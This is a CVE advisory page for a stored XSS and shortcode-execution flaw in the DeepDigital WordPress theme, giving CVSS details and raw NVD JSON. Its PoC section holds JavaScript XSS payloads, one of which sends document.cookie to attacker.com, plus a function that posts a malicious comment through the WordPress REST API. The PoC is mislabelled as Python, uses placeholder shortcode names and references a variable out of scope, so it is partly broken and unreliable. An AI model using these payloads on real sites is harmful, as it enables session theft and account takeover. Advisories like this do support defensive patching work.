Security Vulnerability Report
中文
CVE-2026-22469 CVSS 5.3 MEDIUM

CVE-2026-22469

Published: 2026-01-22 17:16:36
Last Modified: 2026-04-28 19:36:40

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in mwtemplates DeepDigital deepdigital allows Code Injection.This issue affects DeepDigital: from n/a through <= 1.0.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

DeepDigital主题 <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-22469 PoC - DeepDigital Theme XSS/Shortcode Execution // Target: WordPress DeepDigital Theme <= 1.0.2 // Method 1: Stored XSS via comment or form field const xssPayload = '<img src=x onerror="alert(document.cookie)">'; const xssPayload2 = '<svg onload="fetch(\'https://attacker.com/steal?c=\'+document.cookie)"> '; // Method 2: Arbitrary shortcode execution const shortcodePayload = '[shortcode_name attribute=" malicious_code "]'; // Example exploitation via WordPress REST API async function exploitDeepDigital(targetUrl) { const endpoint = `${targetUrl}/wp-json/wp/v2/comments`; const maliciousComment = { content: xssPayload, post: 1 }; const response = await fetch(endpoint, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(maliciousComment) }); return response.json(); } // Method 3: Direct theme shortcode injection const exploitUrl = `${targetUrl}/?s=[shortcode_name]alert('XSS')[/shortcode_name]`;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22469", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:35.643", "lastModified": "2026-04-28T19:36:39.663", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in mwtemplates DeepDigital deepdigital allows Code Injection.This issue affects DeepDigital: from n/a through <= 1.0.2."}, {"lang": "es", "value": "Vulnerabilidad de neutralización incorrecta de etiquetas HTML relacionadas con scripts en una página web (XSS Básico) en mwtemplates DeepDigital deepdigital permite la inyección de código. Este problema afecta a DeepDigital: desde n/a hasta &lt;= 1.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/deepdigital/vulnerability/wordpress-deepdigital-theme-1-0-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}